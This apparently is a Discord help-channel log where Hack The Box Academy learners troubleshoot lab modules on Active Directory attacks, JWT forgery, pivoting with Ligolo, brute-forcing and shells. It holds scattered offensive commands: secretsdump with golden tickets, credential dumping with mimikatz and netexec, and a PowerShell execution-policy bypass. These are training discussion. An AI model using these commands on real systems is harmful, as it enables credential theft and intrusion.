#modules

they use single quotes; which tells bash to interperet everything in between them as literal characters

so that bypasses the need for the double up

GUYS HELP MY EXAM IS NOT WORKING

ANY ADMIN OR MOD, PLEASE, I LOST 1 DAY BECAUSE IT DOES NOT WORK!!

@toxic palm

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

I sent a message like 12 hours ago and no answer

be paitent

Ok, but my exam time is running there are 7 days and because it is not working i lost 1 day :/

Are the labs crapping out right now or is it just me? Trying to do some of the file transfer labs in the CPTS path and getting a lot of detination host unreachable

any technical issues on HTB end in relation to exam issues time will be given back to you

webattack (skill assessment) not getting the endpoint for some reason

nvm got it after resetting and turning off proxy

not sure if its to early to say but will the ai red teaming path become a cert once its finished like the other job role paths

yes

job role paths will lead to certs

in my opinion; likely due to contract agreements, they released the path way before they had it ready so the cert is still being worked on

I'm in the AD enum/attacks module, attacking domain trust child/parent. I have been beatin myself up for a few hours. I know how to dump the hash for the requested user using raisechild. I'm trying to do it manually, create golden ticket, and dump the hash with secretsdump. Error KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database). I'm new here so don't want to drop too much info.

Any pointers on using secretdump with golden ticket guess is the question.

Not used this yet but i had a google and one potential workaround was leaving the admin password out and entering it when it prompts you too, someone more equipped to answer would be better.

I just can't figure out how to get it to work using secretsdump.py domain/user@ip -k -no-pass -just-dc-user domain/user. Used a different method. Just going to bug me until I figure it out.

Did you export the ccache?
Do you have a realm entry in krb5.conf?

I did export the ccache. From there I was able to get SYSTEM on the DC with PSExec using the ccache. I did not add the domain to krb5.conf.

So whats the issue?

Trying to dump the hash of a user in the parent domain with secretsdump.py. Keep getting kdc errors.

Ahh, have you tried removing the --just-dc-user arg?

Might not be able to find it if you specified it

Yes, remove that, tried just-dc, without just-dc

Try specifying a target ip as well?

Yes, tried that. Reset the lab. I also recreated the ticket for an existing domain account, just because I'm throwing darts at this point.

Yeah this is strange will have to boot up the lab myself

if you figure it out, please let me know. I moved on for about 10 minutes, but just spun it back up.

No idea. Went to spin the lab back up, it was still running. Created the ticket again. Ran secretsdump, worked perfect. Maybe being at the console for 12 hours is the problem.

maybe not something like this happend to me too yesterday (for blind xxe module) i did the exact same thing when i came back and boom its solved i was amazed how it worked that time lol

Glad you got it working

I'm on the last question of Attacking WordPress, i tried to edit the 404.php template but got an error "Unable to communicate back with site to check for fatal errors, so the PHP change was reverted. You will need to upload your PHP file change by some other means, such as by using SFTP." I also tried with msf but i didn't gwt any shell.

Hello Guys, i'm on the skill assessment module of Login bruteforcing, i'm stuck at this question : What is the password for the basic auth login?

i'm doing the good command but it doesn't work... it takes too many times.. can you help me ? thank you 🙂

You using the provided wordlists?

yes .. can i show u the previous command that i'm using ?

Go ahead

Looks about right try restarting the target

Deleted the message cos its above tier 0 module btw

alright, thank you i'll try to restart it ..

Yes ! That's why i ask you before sending the command 🙂

Ok so I'm on the lab, had it working, and managed to recreate the problem, I think your issue was you were trying to authenticate to the parent DC with the fake account, you only created the ticket for the account on the child DC so it will only exist in that record, so you'd need to do secretsdump.py with: child.domain/user@dc-FQDN

Hi, I am very new to HTB and am doing the CPTS course, already stuck in the host discovery module in Network Enumeration with Nmap. I am at the end where there is a question asking what the operating system is based on the output. For this do I literally have to pick apart the output or can I use my virtual machine or spawn a workstation to just do a -O and find the operating system that way?

Ok so I wrote in it Windows just to pass it and it worked but I don't understand why it is windows?

This is the output:

Look into the output and focus on the ICMP requests, there is a subtle thing that differentiates Linux and Windows systems at the end of the respective lines

TTL value being 128?

It's funny because when I initially prompted chatGPT it told me it was most likely a linux based system due to the TTL being 128. One google search and its wrong 😂 Got to be really careful with AI

@boreal cypress please don't post so much content of modules above tier 0. This contained spoilers so I removed it as per the rules 🙂

Good boy

Maybe make your modules on par with their price. You cant ask 500 cubes for a module that is explained poorly and expect your customers to not help eachother .

I am sorry but I am not afiliated with the content team. If you think there is a mistake, please post in #1234357888114364508 (I am just a volunteer Discord moderator)

Or contact support 🙂

is there a dnscat2 version available for aarch64?

I believe yes, in the black arch repository

Nah man, you are a volunteer discord moderator with a cute dog

hello guys

i think this is a mistake isn't it |

it shoudln't be written

#1234357888114364508

Didn't expect the Password Attacks Module to whoop my ass so bad

hello guys anyone know how to Mounting Bit-locker encrypted vhd in hard lab , password attack ??

if you use the search function you'll see people have linked several different articles regarding it

https://academy.hackthebox.com/module/51/section/1588
bro where is flag ?
i get root but their is no flag ? nothing in /home too .

/root/?

the module references mounting root to a location. also don't reveal module content; LPE is above tier 0

look around /mnt/root a bit

i.e. cd /mnt/root/root

thz man

Hi everyone hope you are doing well, ive one question! currently im doing attacking authentication module and currently on jwt algorithm confusion attack. im doing the same steps like mentioned but its throwing error. any help will be appreciated.
```python3 jwt_forgery.py eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiaHRiLXN0ZG50IiwiaXNBZG1pbiI6ZmFsc2UsImV4cCI6MTc0NTg1ODI5MX0.<SNIP> ASIYNejb12GEuZjhVNZ0oyqgqUbVOtipqdiiZyZ02A7Zl24rOxiZCkD-iudtSSccWBKFZrzLwWHIegYAbmc1-qleXZ1UOGU4hDXq4iucdZfxnXQnlIFHZc7V0PMlUtjtvuecppcCyYQMlCJ-TYyU6dslJoiMsk7O0ITdMvUmMwtztukKfXvXZ6bUX4ZZsFYh1eRgb20l04LAMLWyVFsVEYOa-CH5eyFb5lqgZRoOGSeL-D--mecWVJkwGY4ogx8XSh2RVxkT1SlkdTZ6cQ4wns94zEpjAO4xvgk0-0jAgk1ME8-VfFAfgWEK6WIJXbI8dgBZSa14WqSyBj9nyFek9w<SNIP>````

Hey everyone, I’m stuck on the " Model Evaluation (Network Anomaly Detection)" section of the "Applications of AI in InfoSec" Module beeing part of the "AI Red Teamer" path. When I upload my local created module file to e.g. to: http://10.129.205.188:8001 the message is "Invalid model file" despite of that I (believe) have followed the instrcutions. In the module section before "Model Evaluation (Spam Detection)" my module was accepted. Did anyone come arround the same challenge? Any ideas are very welcome and thanks in advance!

Hello
Im doing web attcks module
Chaining IDOR vulnerabilities
I tried to fuzz for users in order to find the admin user with the flag but i only get the first 10 users
What am i expected to do?

First things first please put some effort in your question, try to provide more context. For example what were the steps you did? Like I don't even know which section you are referring to even though I just had to open the module.

till how many id's did you fuzz a 100?

Yes

try 200 if not then I would say use a bash script with curl and grep "admin". I can dm you blue print bash script to enumerate users

sorry so currently im doing Attacking Authentication Mechanisms > JWT> algorith confusion part. so i was able to get public key and then now ive PEM file. now im trying to sign that PEM output with jwt sign in cyberchef and its showig error '' Error translating from ArrayBuffer to JSON: SyntaxError: No number after minus sign in JSON at position 1 (line 1 column 2)''

help

the question askes me to enter the first line of the healthcheck.log but still goes wrong when it enter this:

PS C:\ Get-Content -Nhealthcheck.log -Totalcount 1
System health check at 2025-02-24 14:26:46 - CPU Usage: 12%

are you signing it as raw json?

yes i copied the pem output directly to codechef JWTsign box ( secret key placeholder).

maybe there is a thing you need to do before signing the value you provide to codechef

Skills Assessment
Shells & Payloads
im on the 5th question.
I can seem to find a surface for the shell
https://academy.hackthebox.com/module/115/section/1139

Read the blog carefully, there is a exploit that can be exploited to get a shell

Q4 directly relates to Q5

Im on the last question of Shells & Payloads, I have a PS shell but can't seem to navigate to the flag text file

Im not very good with powershell

"Exploit and gain a shell session with Host-3. Then submit the contents of C:\Users\Administrator\Desktop\Skills-flag.txt"

Maybe Get-Content, or type

Also if you used msf: did you type "shell" after it completed?

I uploaded the payload myself, tried type, gc, Get-Content..

Doesn't even let me cd C:\

it stays in the same directory

do you have admin privs?

nope

am i meant to upload a payload that get's me admin privs directly?

Hello, I'm working on the password attacks module on mutated passwords, brute-forcing ssh password with hydra took me one evening and gave me no result, plus the pwnbox is not indefinitely extensible. Is it a hint to do it with my own virtual machine or is it also possible from pwnbox and I'm doing something wrong ?

PS : I used the exact command but I didn't add the "-t 4" to slow password cracking

look closely at the error; "Cannot find path because it does not exist"

the exploit that you use should be a common exploit, the hostname should very much give it away

don't attack ssh

ssh is VERY slow and annoying to attack

there are other services running which will net results way faster

read the question carefully 😉 . Bruteforce the password, then log in with ssh.

sorry i use a different password for all my running services so i can lock myself out

Better than reusing a weak password for everything 💪

plot twist: i'm the admin that has to reset my passwords

Oh!! Ok, guess I've been wreckless on this one. Thank you both @fathom pendant @west canopy 🙂

it's easy to get sucked into the trap of following the question; but this module is notorious for giving you the end-step and not giving you a middle

the end step is xyz but the start is abc

Yes indeed, plus it gives the chance to review what was learned on the previous modules. I was too focused on the objectives. Thanks for the hint 😅

ok so I am that guy. :/ is it normal for the imaps server when connecting to it by openssl really that slow in responding? or is it something I am doing wrong. Tried both the HTB terminal as well as vpn from kali. always seems to hang...

Don't run the vpn and pwnbox at the same time, for one

Second, have you tried changing vpn regions or switching to TCP download?

using pwnbox?

The in-browser vm

That has to be running to get the (terrible) in-browser terminal

I usually use the vpn. but when it was having issues I spun up the pwnbox to see if that would work better. so do not have both connected at the same time?

Correct

It's because they both use the same config file to connect to the vpn server

ok will try that.
That makes a lot more sense now.
Thank you!

So you get collisions, as both machines are assigned the same ip under the same network

That would have been an AWSOME note someone where in the instructions. lol or I totally missed it in the instructions

https://help.hackthebox.com/en/articles/9297532-connecting-to-academy-vpn

https://help.hackthebox.com/en/articles/5185687-introduction-to-lab-access

yep I totally missed it. Sorry about that and thank you very much for your help

is this forum post still relevant to the lab? https://forum.hackthebox.com/t/footprinting-lab-hard/250716

doesnt seem to align the with the lab description.

Should still be valid

thx

From the looks: it looks like you didn't even attempt and just looked for solution instead of even trying different things

Not sure how you managed to assume all that from just a question and the link but i wasnt getting snmp services enumerated with the IP on a -p- nmap scan

Some services are on udp

good point. thanks for the reminder. got a lil tunnel vision.

I find HTBs explanation of the The Merkle Tree Structure in the Information Gathering - Web Edition module to be contradictory to my understanding of how hashing works maybe im 2 digit iq but it makes no sense to me

if hash 1 is cert 1 hash + cert 2 hash how would you verify hash 1 without the hash of cert 1 if you only have the hash of cert 2

https://en.wikipedia.org/wiki/Merkle_tree

also how do you verify the root hash without hash 2 if the root hash is = hash 1 + hash 2

is there some mathematics im missing

yeah there is some maths you're missing

https://medium.com/coinmonks/merkle-tree-a-simple-explanation-and-implementation-48903442bc08

but this is not what it says in the module

Hi, any tutorial to help me complete hack the box academy Pentest in a nutshell?

I meant this

anyway i doubt no one cares about that

its such a small part

so the thing you're missing: is that the hashing concatenates the hashes of the leaves

so it's not adding 'a123' and 'b456'; it's combining them into 'a123b456' and hashing that

"For example, in the picture, the integrity of data block L2 can be verified immediately if the tree already contains hash 0-0 and hash 1 by hashing the data block and iteratively combining the result with hash 0-0 and then hash 1 and finally comparing the result with the top hash. Similarly, the integrity of data block L3 can be verified if the tree already has hash 1-1 and hash 0." this is from the wikipedia article and its not the same as the explanation i htb

it is the same explanation; just worded differently

in htb they say you would need hash 0 instead of hash 1

they are indexing at 1

for simplicity

yes exactly

I changed it so it would work for the Wikipedia example

Hash 1 is the hashes of the certs of leaves 1 and 2 concatenated and hashed

but how do you get hash 1 if you dont have leaf 1?

well that's the thing with CTLs; they'd be available for you to find

it's not like they just don't exist

they have to exist

For instance, to verify Cert 2 (blog.inlanefreight.com), you would need:

Cert 2's hash: This directly verifies the certificate itself.
Hash 1: Verifies that Cert 2's hash is correctly paired with Cert 1's hash.
Root Hash: Confirms that Hash 1 is a valid part of the overall log structure.

you're not gonna run into a case where you won't have access to a cert you can't verify the tree from

i thought it would be: Cert 2 itself
Hash of Cert 1 (the sibling hash)
Hash 2 (the sibling at the next level)
The Root Hash

anyway maybe im cooked

they don't really do a good job of showing that it's a vertical from the SSL cert -> hash of cert

https://www.investopedia.com/terms/m/merkle-tree.asp

so yeah it may be poorly explained and better to post the need for clarification in #1234357888114364508

yeah I guess I just fail to understand how you get hash 1 without both leaves

the link i just posted explains it much better

ok thanks

what specifically are you having trouble with

pointing you to a tutorial is gonna do nothing but have you rely on others to solve the problem for you

@spare river if this isnt a hallucenation it might be helpful:

In a Merkle tree, the top hash (also called the Merkle root) cannot exist without the hashes below it, such as hash0 and hash1. This is because:

🔑 The Merkle root is computed from child hashes:
Each non-leaf node in a Merkle tree is the hash of the concatenation of its two child hashes.

For example:

ini
Copy
Edit
hash_root = hash(hash0 + hash1)
So, to compute the root hash, you must have hash0 and hash1 available.

🧱 What if there's only one leaf?
If the tree has an odd number of leaf nodes, some implementations duplicate the last node to make a pair.

Example:

Only one hash (hash0)?

ini
Copy
Edit
hash_root = hash(hash0 + hash0)
✅ Summary:
The Merkle root requires its child hashes to be computed.

It cannot exist independently without them.

If only one child exists, it is usually duplicated to form a pair.

i only remember them BARELY from data structures class but my memory was telling me that i used to remember these similar to the way tables of contents were taught to us in school when we were writing essays...

1
  1.1
  1.2
  1.3
2
  2.1
  2.2
3
  3.1
4
...

you dont create a section if it doesnt have children under it, like section 4 would not be the "right" way to create the TOC.

it looks like there are SOME special circumstances where a merkel tree would only have one leaf:

⚠️ Special or Degenerate Cases:
1. Only One Leaf Node
If there’s only one leaf, it becomes the root.

No child pairing needed because:

There's no need to hash up a tree — that leaf is the tree.

So:

plaintext
Copy
Edit
Merkle Root = hash(leaf0)
Or just leaf0 if no further hashing is done.

2. Non-Binary Merkle Trees
In some systems, Merkle trees can be n-ary (e.g., each node has 3 or more children).

These aren't true binary Merkle trees, but still follow the pattern: parent = hash of child hashes.

The concept still applies — you can't compute a parent (or root) hash without all its children.

3. Sparse Merkle Trees (SMTs)
Used in privacy-preserving and cryptographic contexts.

Allow efficient representation of very large key-value maps.

May have branches that don't exist explicitly but are assumed default values (e.g., zero hashes).

In this case:

Root may mathematically exist even if some children are just "default" or placeholders.

Still: conceptually, the root depends on its "children," whether real or implied.

✅ Summary:
Yes, in nearly all practical or secure implementations, a Merkle root depends on its children.

No, it’s not strictly required that it have exactly two child nodes in all implementations (e.g., odd leaf counts or 1-leaf trees).

The core rule is: the root exists only as a function of the hashes beneath it — not independently.

again take that info with a grain of salt its gpt

Well yes I agree with this and this is what im trying to say xD "The Merkle root requires its child hashes to be computed."

but this is not the case in HTB explanation

also in the HTB explanation there is an even amount of leaves

I don't see any amount of mathematical gymnastics where the HTB explanation work

but im no mathematician only slightly autistic

and even if you had both leaves you would still need hash2 and not hash1 because you already have hash1 beacuse you have the leaves

both leaves (cert 1 + cert 2) = hash1, and hash1 + hash2 = root hash

also this is not a big deal for me personally but i need to say it because otherwise I will think about this the entire night

I had to see what claudAI said about this lol (take it with a grain of salt also):
"The explanation they provided is mathematically inconsistent. Merkle tree verification requires all sibling hashes along the path from leaf to root - that's the fundamental principle that makes the verification process work.
To be absolutely clear:

You cannot verify the Root Hash without both Hash 1 and Hash 2

If they're claiming you only need "Cert 2's hash, Hash 1, and Root Hash" for verification, that's simply incorrect from a cryptographic standpoint. The process they describe would be impossible to execute mathematically."

Kk

Hey there! I have a question about the Password Attack Skill Assessment - Medium, I finished it and would like to be sure to understand the very last step required by the lab. Would anyone who has already done it let me dm them ?

Sure

@stray pilot No. This isn't a hacker for hire server.

lmfao

are the modules for the skill path correctly in order?

yes

yo does this fr work?

if there's an odd amount of leaves; the last leaf is doubled and computed

ok so im doing the pentester skill path
did the getting start
it include almost everything like basic like nmap, enumeration, reverse shell, etc...
then the module after that getting start module is stuff with nmap again

i haven't unlock it yet
my guess is like advance nmap stuff?

Yes it explains the basic process

Then goes into different techniques

yep the biggest thing i learned from the basic modules is RTFM

like how i learned from google and RTFM for ffuf that you can set -maxtime-job <time in seconds> to have it each job (say if you're doing a recursive scan) in a set amount of time, regardless of if it finishes the wordlist or not

there's also -maxtime if you want to set an overall limit to the process

i'd thank redoing the ffuf module for me learning that; instead of waiting for 30 minutes for it to do the things

how do you create module

i wanna make one 😂

you have to basically be a subject matter expert on a particular topic and you can potentially approach customerops@hackthebox.com with the idea and work with them to create it

I wouldn't say like expert expert
more like intermediate

idk if they approached chick3nman when they made the hashcat module, but his expertise would definitely be goated for a higher tier hashcat module (he's one of the main guys that work on hashcat, he's goated FRFR)

he's like beetlejuice sometimes, you talk about hashing enough, he pops up :D (I mean this lovingly)

I'm going from reverse engineer to CPTS is like a huge change

i just read the #academy-announcements and saw someone made the dynamic analysis module

i should make mine for malware analysis with static and dynamic analysis
also teach people the YARA rule too

i've only used WinDbg (i always say it as Windy Bag) to explore BSOD dumps

Hi, Im having issues with the "Attacking SAM" page, which is inside of the "Password Attacks" module

essentially my machine is not able to host a share, ive tried a few commands but none seem to be working

This is the command im using to host the share

"sudo smbserver.py share . -smb2support"

There are a lot of ways you can file transfer, doesn't have to be with SMB.

Your command is missing an argument.

a few arguments it looks like

yeah i hate SMB transfers, im just following the module

This is from the completion guide

Did you try the command that was taught in the section?

what OS are you using?

Im using the pwnbox

so parot os

oh wait its not parot

debian

i used kali and the command worked for me. idk about the pwnbox since i haven't used it much. pwnbox is parrot os.

ah okl

is there an error message or anything?

Can i dm you to send images

or can i post them here

can't post things from modules above tier 0

ah ok

no errors?

Yeah theres no error, but i put it into chatgpt also to see what im doing wrong. Essentially it told me that the share i want is not being hosted, and instead it keeps defaulting to the IPC$ share

so what happens when you run the command if there are no errors, it just put you back into the terminal?

no, its kinda hard to explain without images. I think the command is running and it is accepting connections to it without me moving any files. Ima just paste it and you can delete it later

IPC$ share keeps being used, which is apparently normal when setting up a share

and also when i try to move things from the admin cmd on the victim machine. It says "directory not found"

so your command actually is working

ah okay, thats good then

you said the machine couldn't host the share but it's working and getting incoming connections.

from the public internet...

ah okay, that confused me lol, but why is it stating the share doesnt exist when i try to move files to it

are you just blindly copy-pasting from the module?

or did you modify the IP to be the pwnbox IP etc

no, i changed the directory and ip name

it's very strange that you're getting those public connections.

yeah thats what confused me in the first place

you ran the smb server from the pwnbox?

it happens to any share that i host, because in the example and walkthrough they dont get it

yh

idk sorry i have to get to bed

lmao np

Ok looks like creating a new pwnbox / lab fixed the issue. I think when creating the share at the start, i specified a local directory that doesnt exist on the machine. So it broke my whole lab

with linux/sharing if you want to specify current dir it's best to use ./ instead of just .

ah okay, yeah its a bit of a headache. I just created a directory instead

I also found the issue to why the file wasnt moving. The module might be slightly outdated or incorrect. Is there any place i can report this so it can be fixed in the future?

It isnt a big issue, but more like a "Slice of life" mod. because following the example leads to a syntax issue

if you feel there's an issue, #1234357888114364508

u funny lol

I mean, it is the right channel, they just wanted to move you there so that if anyone else has a similar complaint/issue its easy to find

noo its not that

she was right, but she said skill issue and closed the ticket

but it was rightfully closed

Imagine not doing cd before move...

https://tenor.com/view/anya-forger-anya-spy-x-family-gif-17200077238442027522

sometimes we just need a hand to hold

Nahh, just stand on the shoulder of giants, your issue was you were sitting down, gotta try hard to stand up

Plus its better for your posture

true, heightmax

Sry for a lot of text but I said in my response that in the HTB example there is an even amount of leaves

since it's not really the focus of the module it's not something that they're gonna go in detail on. Likely by trying to keep it brief they skipped some info

🙏🏽

nah the issue was layer 8

Yeah I get it, but it’s wrong but as you say it’s not important

closed it so that the staff that monitor for issues in that channel don't think it's a legit issue in the module

Hey I am new to htb can anyone guide me how to start journey in htb

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

@manic totem check the link above

Also please get your account identified, instructions -> #welcome
this is so you can access other channels like #general

Hi all. When reporting & documenting the finding evidence, the module recommends writing a narrative between figures describing what is going through the pentesters head at the moment. When I'm looking at the sample report, it does not write a narrative, but rather what is happening in the figure. Which is the correct way? Which is the correct way to apply? Please delete if not allowed, as I am not sure if this is above T0

If I wrote down what I was really thinking, the report would definitely not make a professional impression. 🤪

I always describe what I did, how I proceeded and, if necessary, I show this using a screenshot

Hahaha, I think thats were I went in the wrong. If I use the same writing style as the one in the sample document, will that be sufficient?

Because IMO it's more an explanation of what is happening, not what 'the tester' was thinking at that moment to proceed.

I think I will just continue to use the sample report as an inspiration on how to report the Finding Evidence. Thank you

I think it should be a narrative of what's happening, not a narrative of what the tester is thinking

-# take with a grain of salt I haven't done the reporting module yet

Hahaha

Thanks dude

Yeah tbf I did use a narrative on my attempt, but did not receive a passing score. I thought we were meant to give an extensive description in the finding evidence, but I think using the style in sample report is the way to go.

Keeping it minimal and clear

hi, I'm doing Active Directory Enumeration & Attacks and every time i try rdp into the machine during the practical part it always tells me incorrect pwd/username pls help. module: Deeper Down the Rabbit Hole

that's not a section... which one of these is it?

ohh the windows one thanks!

can you copy paste the exact command you're using?

rdesktop 10.129.68.35 -u htb-student -p 'Academy_student_AD!'

have you tried using xfreerdp ?

and also - xfreerdp /v:10.129.68.35 /u:htb-student /p:Academy_student_AD! /cert-ignore /bpp:8 /network:modem /compression -themes -wallpaper /clipboard /audio-mode:1 /auto-reconnect -glyph-cache /dynamic-resolution

but this will give me this error '[17:02:15:551] [1579642:1579648] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
'

i also tried the basic one without the paramters and still same error hmm

Is student capitalized in the password?

They both seem to work for me... have you tried resetting the lab? only the xfreerdp one works for me

xfreerdp /v:<IP> /u:htb-student /p:'Academy_student_AD!'

@tidal hearth

I added the single quotes to the password in case it was interpretting the !

hmmm still gives me this error "[17:23:07:647] [1595215:1595221] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[17:23:07:647] [1595215:1595221] [WARN][com.freerdp.crypto] - CN = ACADEMY-EA-MS01.INLANEFREIGHT.LOCAL
[17:23:16:789] [1595215:1595221] [ERROR][com.freerdp.core.connection] - Timeout waiting for activation
[17:23:16:790] [1595215:1595215] [ERROR][com.freerdp.core] - freerdp_abort_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_CANCELLED [0x0002000B]
"

i've tried resetting the box multiple times

but i can rdesktop in but then it says incorrect password

even if i use quotes

use cert ignore

Yo

might need to run it twice or use /cert-ignore

xfreerdp /v:10.129.102.170 /u:htb-student /p:'Academy_student_AD!' /cert-ignore

still doesnt work - [17:27:51:381] [1600226:1600232] [ERROR][com.freerdp.core.connection] - Timeout waiting for activation
[17:27:51:383] [1600226:1600226] [ERROR][com.freerdp.core] - freerdp_abort_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_CANCELLED [0x0002000B]

oh wait work now thanks!

What should I do if I reached a login page

mimikatz lsadump::secrets and netexec --lsa, both should be dumping same lsa secrets right? but i can only extract the creds using netexec method, anyone know why?

I think you should login

maybe use sekurlsa module

Yh but how do I get the credentials

when you register, you make a username and a password, use those

Yh but there are specific ones that has files in them

https://tenor.com/view/huh-cat-huh-m4rtin-huh-huh-meme-what-cat-gif-5834484041415217257

I try bruteforce but i can't get it

Is this for a module?

Yh

you gonna specify which one?

Nocturnal

#boxes if you dont have access get identified, instructions: #welcome

guys i have a doubt regarding the shells and payload skill assignmnt

when we logon to the target using rdp, and I try to connect to shell on target

I'm unable to connecti, I used the target IP as LHOST and I dunno where I'm going wrong

Help

?

I mean, could u elaborate?

Generally the LHOST will be your VM, pwnbox, or in that scenario I believe the foothold you are given. If by target you mean the foothold, check your interfaces and ensure you are setting the correct one.

Helo, anyone take prolabs alchemy?

anyone here did Sliver module? i need help to chat abt smth in DMs im LOOSING my mind

HELLO

Anyone help me

DM me to help

#1263635449335910531 , if you dont have access get identified, #welcome has instructions

what do you need?

My account back.

what?

your HTB account?

Got an issue with a module flag, someone avaible just to check if it's my mistake? (probably is)

probably be better if you could specify the exact module and section

It's in the Intermediate Network Traffic Analysis and it's the ICMP tunneling part

pretty sure i got the flag right but cant validate it

ah never mind

i think i got my mistake

Yep all good 👍

You can shoot me a DM.

I don't have enough disk space for windows vm, can I hope to get through fundamental modules (such as windows fundamentals) and majority of easier stuff without breaking down my main os and losing all data stored on disk?

I’m pretty certain I’m supposed to add things to the /etc/hosts file but it’s unwrittable, is there something else I’m supposed to do? This is for the Attacking Web Applications with Ffuf module.

wdym unwrittable?

sudo?

Oh am I supposed to use sudo

Need help guys

I previously redeemed a gift card on The Academy Platform, and the amount was added to my account balance. Now, I'd like to use this balance to purchase a student subscription. Can you guide me ?

Hello, I'm on password mutations (https://academy.hackthebox.com/module/147/section/1391), and running the brute force with the mutated list and user name 'sam'. it has been running for over half an hour, is that normal for this module?

btw the error here isn't the freecom rdp abort; it's the line above: Timeout waiting for activation, you were getting timeout errors -> connection issues

don't attack ssh

reach out to support

Ok

dont use hydra? or use hydra but not ssh

my phrase was: don't attack ssh, not sure how you interpreted that as "don't use hydra"

bc that's how i roll

yea well that shows poor reading comprehension, just saying

Hi 🙂 I'm struggling with the enumeration module on the oracle TNS section. The tools are installed and running, does not the seem to be problem here. But I cannot find any credentials with odat. The solution shows ||that scott/tiger can be used / should be found.||. Furthermore, when connecting to the DB using sqlplus, I do not get a succesful login / no SQL prompt. Any hints/ideas/nudges?
(the STMIP differs here as I took a break in between two several tries, obv. I tried it with the correct STMIP both times).

try resetting the target or changing vpn regions

tried resetting, but will try different region 👍

if the issue persists; reach out to support

@full walrus ask here

I'm working on the active directory enumeration & attacks module.

For some reason, SharpHound is missing out data for domain trusts. Viewing the collected sharphound data in bloodhound, when running the 'Map Domain Trusts' query, no data is returned. However, when I use powerview's Get-DomainTrust, I can see there is a forest trust.

Why is this?

Wouldn't always trust bloodhound. Good to know other ways to do things as you have shown

Hi all. I'm working on module "Kerberos Attacks" Section "AS-REPRoasting". The task is asking me to RDP into a machine, but I'm getting a failed logon attempt error when using the provided credentials. Any ideas?

I managed to solve this by installing and using Bloodhound CE. For some reason bloodhound legacy is missing out on some information even when ingesting from the same collector. Bloodhound CE shows all the data just fine

Its probably the server, try resetting and wait a few minutes for the machine to start up.

Hm i've tried resetting it and waited like 15 minutes i'm worried i'm doing something dumb 😄

Its logging in with the htb-student credentials right? Whats the command you are using?

Yeah. I'm just using windows rdp

Try xfreerdp /u:htb-student /p:'HTB_@cademy_stdnt!' /v:IP /dynamic-resolution /drive:kali,. where drive will give acces to your files which is nice.

by windows RDP are you initially connecting to the lab via rdp from a native windows device? (the 10.129.x.x ip)

Hm. Yeah, worked thanks ❤️ guess i'll just stick to kali 😄

Yeah

if it's your host machine: that can definitely not be a good idea, but for the most part -- using a vm is best, linux vms have tools to connect to rdp instances. Rdesktop, xfreerdp

Hi, I’ve just completed the Pivoting, Tunneling, and Port Forwarding module and I’m trying to practice double pivoting using Ligolo-NG. I’m currently attempting to establish a connection between 172.16.5.35 and my attacker machine (10.x.x.x), but I’m having trouble getting the second Ligolo agent to connect back.

My goal is to have multiple Ligolo sessions to pivot through several machines in the network. Could someone assist with setting up double pivoting with Ligolo-NG or explain the correct approach to achieve this?

Thanks in advance!

Roger that. Will stick to the kali machine. 😇

port forwarding is your friend

you need to forward from host A to your attack machine port 11601

(default ligolo port)

every step needs to link back

so attack <-> A (they have the same interface connection, so they can freely communicate)
A <-> B these can freely connect because they share an interface
attack -> B via your agent on A, the communication is 1-way because B doesn't have an interface to connect to your attack machine

I have tried it and for some reason it retrieves an error " cannot assign requested address

Add listeners listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 --tcp let agent connect to your IP.

thanks I will try once again 🙂

then you are likely trying to reserve a restricted port?

also you need to be running your ligolo proxy as sudo

at least in order to use it's QoL features; such as creating interfaces and tunnels

also when you use powershell to execute the agent: first in the session
Set-ExecutionPolicy Bypass -Scope Process

Thanks, i got it

Hello,
Module : AD Enumeration & Attacks - Skills Assessment Part II

I'm really stuck on the question 8 "Submit the contents of the flag.txt file on the Administrator Desktop on the MS01 host.". I've managed to obtain system rights on the SQL01 instance. Then, I tried using mimikatz on my revershell obtain on my meterpreter session. I got an admin hash ||starting with 136b||. I used this hash during a PTH to access the MS01 instance but it didn't work, the hash is not valid.
So i've used it on the SQL01 using evil-winrm and the Administrator account. I then reused mimikatz to try obtaining a different hash but i kept getting the same wrong hash.
I'm really lost at this point. I'd be glad if someone could help me on this one 🙂

the admin accounts may not always have the same hash; remember administrator is a "local" account to the machine, so you'll have to be more creative

That's what i thought. So i've enumerated the users and found the one starting by ||mssql||, but i couldn't reused its hash and couldn't find its cleared password

Here's what I’ve done so far:

I gained access to a host at 10.129.x.x via p0wnyShell.
I transferred the Ligolo agent and successfully established a tunnel back to my attacker machine on port 443.
From my attacker machine, I can ping the internal NIC 172.16.5.15, confirming tunnel connectivity.
After internal network enumeration, I moved laterally to 172.16.5.35, and then to 172.16.6.25.
I transferred the Ligolo agent to the host at 172.16.6.25 (path: Z:) and tried to initiate a second Ligolo tunnel from there.
However, I’m unable to establish the second Ligolo connection from 172.16.6.25 back to my attacker machine.

I guess I keep missing something ^^

Did you add a listener?

I get permission denied when I tried [Agent : www-data@inlanefreight.local] » listener_add --addr 0.0.0.0:443 --to 127.0.0.1:443

my proxy is running on port 443 that's why i ran it on 443

Okay run ligolo as root to solve that.

it runs as root

Then kill the proces using port 443 but easier would be to use default port 11601 if possible.

okay I will redo everything and keep you posted

thanks a lot for your time 🙂

Yes if theres no ports being blocked use port 11601.

still facing the same issue on port 11601

Permission denied?

i managed to add the listener but i cannot connect to the proxy

Ill send you a DM okay?

Sure thanks !

got a question, has anybody checked try hack me content after they studied on HTB academy for a while?
i've been on HTB academy for quite sometime but for some reason checked THM content on matters i've already learned.

i've noticed something that makes THM far superior compared to HTB academy, they tend to walk the student through like they really don't know a thing, in comparison HTB academy, it required me to do alot of outside research, they also have a very useful feature that is opens a popup window on the words that the student may forget over time such as (Active Directory OU, etc..).
has anyone noticed the same or is it just me? or is it because i'm reading something i've already learned?

Thats an opinion that'll get you crucified by many here. Most people here dislike how hand-holding THM is

It could also partially be because you already learned some of it

The value of HTB is it also teaches you to research, you're not gonna be given the exact command every time to do something, but you'll be able to extrapolate the information you need to succeed

so its not only me who have seen THM is hand holding the student through the topic

It's the main reason people dislike THM overall, among other reasons

